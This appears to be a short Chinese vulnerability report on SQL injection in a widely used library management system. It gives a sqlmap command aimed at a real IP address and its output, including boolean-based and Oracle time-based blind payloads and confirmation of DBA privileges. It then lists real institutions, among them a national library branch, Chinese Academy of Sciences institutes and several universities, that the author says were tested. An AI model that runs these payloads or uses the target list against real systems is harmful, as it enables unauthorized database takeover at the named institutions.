某通用图书馆管理系统sql注入，主要是某个某页面存在sql注射。
sqlmap.py -u http://219.242.65.10/fsweb/makeintert.aspx?id=123 --is-dba
sqlmap identified the following injection points with a total of 0 http(s) requests:
---
place: get
parameter: id
type: boolean-based blind
title: and boolean-based blind - where or having clause
payload: id=123 and 7478=7478
type: and/or time-based blind
title: oracle and time-based blind
payload: id=123 and 9273=dbms_pipe.receive_message(chr(105)||chr(111)||chr(105)||chr(98),5)
---
[11:34:18] [info] the back-end dbms is oracle
web server operating system: windows 2008 r2 or 7
web application technology: microsoft iis 7.5, asp.net, asp.net 2.0.50727
back-end dbms: oracle
[11:34:18] [info] testing if current user is dba
current user is dba: true
[11:34:25] [info] fetched data logged to text files under '/users/leek/desktop/sqlmap-dev/output/219.242.65.10'
dba==true
在它的客户名单里测试了几个，
国家图书馆中央社会主义分馆:http://www.zysylib.org.cn/
中国科学院物理研究所:http://libiop.iphy.ac.cn/
中国科学院软研所:http://124.16.136.160:8083/iscas_lib/
还有各种大学用户，
中国矿业大学:http://219.242.65.10/fsweb/default.aspx
华东交通大学:http://lib.ecjtu.jx.cn:80/gdweb
华北科技学院:http://211.81.174.140/